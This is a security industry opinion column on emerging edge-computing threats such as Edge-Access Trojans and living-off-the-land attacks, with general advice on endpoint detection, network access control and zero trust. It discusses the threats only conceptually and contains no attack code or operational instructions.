Security Experts:

Living Off the "Edge" of the Land

Edge-Access Trojans (EATs) allow attackers to collect data and even disrupt crucial decisions as the edge of the network

Edge computing is eminently practical in that it solves several important problems, many of which are related to the latency created when data must travel long distances. The edge offers significant functional and economic benefits, such as the emergence of a new breed of real-time applications. And the need for more edges has increased due to the proliferation of IoT and operational technology (OT) devices, as well as smart devices powered by 5G and AI that enable real-time transactions. 

At the same time, though, such a profusion of devices expands the attack surface, creating new entry doors into corporate networks. New edge-based threats are emerging as cybercriminals target the entire extended network as an entry point for an attack. Malicious actors will work to maximize any potential security gaps created by intelligent edges and advances in computing power to create advanced and more destructive threats – and at unprecedented scale. 

As edge devices become more powerful, with more native capabilities, criminals will design new attacks to "live off the edge." An increase in attacks targeting OT, particularly at the edge, is likely as the convergence of IT and OT networks continues. It’s important to understand the nature of attacks headed for the edge in order to properly prepare for them.

New edge threats emerge

FortiGuard Labs predicted last year the advent of Edge-Access Trojans (EATs), designed to target edge environments. This approach has the advantage of allowing bad actors to collect data and even disrupt crucial decisions as the edge of the network, where time sensitivity is paramount. This would create an entirely new level of urgency to ransomware attacks, particularly when it comes critical infrastructure systems.

[ READThe Intelligent Edge: An Increasing Target for Bad Actors ] 

Attackers can also use EATs to corrupt data, which may significantly impact downstream systems that rely on data collected by edge devices. Such edge footholds can also be used to tunnel back to the corporate network. Though end-users and their home resources are already targets for attack, sophisticated cybercriminals will use these as a springboard into other activities going forward. Corporate network attacks launched from a remote employee’s home network, especially when usage trends are clearly understood, can be carefully coordinated so they do not raise suspicion. 

Another edge challenge: Living off the land 

Living-off-the-land attacks allow malware to use existing toolsets and capabilities within compromised environments. It’s a particularly tricky situation because attacks and data exfiltration look like normal system activity and go unnoticed. The March 2021 Hafnium Exchange attacks used this technique to live and persist in domain controllers. 

Living-off-the-land attacks are effective because they allow attackers to hide their activities in legitimate processes and makes it harder for defenders to detect them. These tools also make attack attribution much harder. 

Living off the land at the edge 

We believe EATs and living-off-the-land will converge in 2022. Criminals will design new attacks to live off the edge “land” as edge devices become more powerful and, of course, more privileged. Edge malware will monitor edge activities and data and then steal, hijack or even ransom critical systems, applications and information while avoiding detection. 

Endpoint security becomes increasingly important

Every point of connection represents a possible attack surface. IoT edge devices and the IoT devices they connect with present new vulnerabilities for a network. Some edge devices come with default passwords, such as “admin,” that customers may neglect to change. Other devices are personal ones that a user may log in to and then leave open, allowing an attacker to access the network. Examples include smartphones or smart cars, both of which can be stolen while the user is still logged in to the network.

Protecting your organization from these new edge-based threats will require you to upgrade end-user devices with advanced Endpoint Detection and Response (EDR) technologies along with enhanced network access controls (NAC) – including zero trust network access (ZTNA). NAC can identify and evaluate IoT edge devices when they connect to a network. The system then examines and verifies each device’s credentials before the device is allowed to interact with the network. In addition, secure web gateways will become increasingly crucial to protecting the extreme edges of the network. 

Securing the edge

Cybercriminals are tireless in their efforts to attack everything they can, and that includes the edge. The convergence of the “living off the land” and EATs trends is particularly dangerous, as it enables attackers to go unnoticed while they carry out their schemes for as long as they want. With every endpoint a potential entry point, you need EDR and other advanced defense solutions working together to thwart edge attacks. 

view counter
Derek Manky is Chief Security Strategist & VP Global Threat Intelligence at FortiGuard Labs. Derek formulates security strategy with more than 15 years of cyber security experience behind him. His ultimate goal to make a positive impact in the global war on cybercrime. Manky provides thought leadership to industry, and has presented research and strategy worldwide at premier security conferences. As a cybersecurity expert, his work includes meetings with leading political figures and key policy stakeholders, including law enforcement. He is actively involved with several global threat intelligence initiatives including NATO NICP, INTERPOL Expert Working Group, the Cyber Threat Alliance (CTA) working committee and FIRST – all in effort to shape the future of actionable threat intelligence and proactive security strategy.